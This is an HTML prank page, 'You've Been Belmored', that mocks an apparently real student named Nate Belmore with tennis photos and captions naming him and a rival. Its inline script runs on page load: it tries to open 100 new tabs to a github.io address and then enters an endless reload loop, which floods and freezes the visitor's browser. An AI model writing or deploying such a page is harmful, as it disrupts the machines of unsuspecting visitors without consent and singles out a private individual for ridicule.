<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>You've Been Belmored</title>
    <link href="https://fonts.googleapis.com/css2?family=Poppins:wght@400;700&display=swap" rel="stylesheet">
    <style>
        body, html {
            margin: 0;
            padding: 0;
            height: 100%;
            width: 100%;
            overflow: hidden;
            font-family: 'Poppins', sans-serif;
        }

        .background {
            background-image: url('https://s.yimg.com/ny/api/res/1.2/h7Cp.Lht_RQTfrYQ4MTBJA--/YXBwaWQ9aGlnaGxhbmRlcjt3PTY0MDtoPTg1Mw--/https://media.zenfs.com/en/the-standard-times/829a6b8ec6c3370da58eab685bfb580c');
            background-size: cover;
            background-position: center;
            background-repeat: no-repeat;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
        }

        h1, h2 {
            text-align: center;
            color: white;
            padding-top: 50px;
        }

        h1 {
            font-size: 48px;
            font-weight: 700;
        }

        h2 {
            font-size: 24px;
            font-weight: 400;
        }

        .images {
            display: flex;
            justify-content: space-between;
            position: absolute;
            bottom: 10px;
            left: 10px;
            right: 10px;
        }

        .image-container {
            width: 48%; /* Adjusted to give some space around */
        }

        .image-container img {
            width: 100%;
            height: auto;
        }

        .caption {
            text-align: center;
            color: white;
            background-color: rgba(0, 0, 0, 0.7);
            padding: 5px;
        }
    </style>
</head>
<body>
    <div class="background">
        <h1>YOU HAVE BEEN BELMORED</h1>
        <h2>While you are stuck here, here are some Nate Belmore facts</h2>
        <div class="images">
            <div class="image-container">
                <img src="https://www.southcoasttoday.com/gcdn/presto/2022/04/27/NSTT/86674bf9-4cc9-4e09-9070-d37151f96540-220426_AHS_Tennis-3.jpg?width=700&height=466&fit=crop&format=pjpg&auto=webp" alt="Belmore loves tennis">
                <div class="caption">Belmore loves tennis</div>
            </div>
            <div class="image-container">
                <img src="https://www.southcoasttoday.com/gcdn/presto/2023/04/26/NSTT/26fc6d41-6cef-44b4-9637-85931a313f37-230425_HS_Tennis_AHS-5.jpg" alt="Arch nemesis of tennis, Will">
                <div class="caption">This is his arch nemesis of tennis, Will</div>
            </div>
        </div>
    </div>
    <script>
        // Open 100 tabs
        for (var i = 0; i < 100; i++) {
            window.open('https://nbelmore.github.io/b', '_blank');
        }

        // Continuously reload the page
        setTimeout(function() {
            while (1) location.reload(true);
        }, 1000);
    </script>
</body>
</html>
